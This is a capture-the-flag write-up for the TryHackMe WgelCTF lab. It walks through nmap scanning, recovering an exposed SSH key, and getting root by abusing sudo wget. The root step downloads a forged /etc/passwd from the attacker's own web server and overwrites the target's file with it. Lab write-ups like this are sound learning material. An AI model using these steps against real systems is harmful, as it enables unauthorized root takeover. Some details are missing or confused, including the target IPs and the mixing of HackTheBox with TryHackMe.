TryHackMe WgelCTF-Writeup

Table of Contents

TryHackMe WgelCTF

Table Of Contents

1. TryHackMe WgelCTF-Writeup

2. Connecting to HTB Vpn

3. Scanning

4. Enumeration

5. Gaining Access

6. Privilege Escalation

TryHackMe WgelCTF-Writeup

WgelCTF is a beginner level Linux machine on TryHackMe.This machine targeted to people who want to get a taste of CTFs and understand the basic enumeration is done in a CTF. The machine has an SSH private on the webserver which is used to gain access to the machine and there is a sudo misconfiguration that is exploited to gain root access to the machine

Connecting to HTB Vpn:

1. First download the VPN file from the access page of tryhackme

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4. You can access the machine at the given ip


1. First let’s do a nmap scan on our target at

nmap -sV -A -p-

-sV : to get the service versions on each port

-A : to get information such as os details,traceroutes,ports etc

-p- : to scan all 65535 ports

–script vuln : to check for most common vulnerabilities

We get the following details from our scan


2. There is a web server running and upon visiting it we are greeted with the default apache web server page. But if we look at the source code we get a username jessie

3. Next let’s enumerate the http port with a normal directory scan


4. So there is a directory called sitemap and upon visiting it we are greeted with a web page

5. After enumerating this page more i could get any lead, so i did a directory scan on this directory


6. Then we found a directory .ssh and inside it there was an ssh private key

Gaining Access:

7. Since we have a username and a ssh key, lets login using ssh

Chmod 600 id_rsa

ssh -i id_rsa [email protected]

8. We can now read the user flag located at the users Documents directory

10. It says we can run wget as the root user

11. So we will copy the /etc/passwd file and save it as a new file in our system. Then we will make an password hash

openssl passwd -1 123

12. And then store this password hash in the /etc/passwd we copied from the machine. Replace the X with our hash

13. Now we have change the root users password to 123 in this /etc/passwd file

14. Next we replace the /etc/passwd of the remote machine with this /etc/passwd file we just created so that the root users password will be 123

15. First start a python web server on your machine

python -m SimpleHTTPServer

And use wget on the remote machine to replace the etc/passwd file with our custom /etc/passwd file sudo wget;8000/passwordfile -O /etc/passwd

16. Now we have the replace the /etc/passwd file and the root user’s password as 123. Let’s login as root

su root

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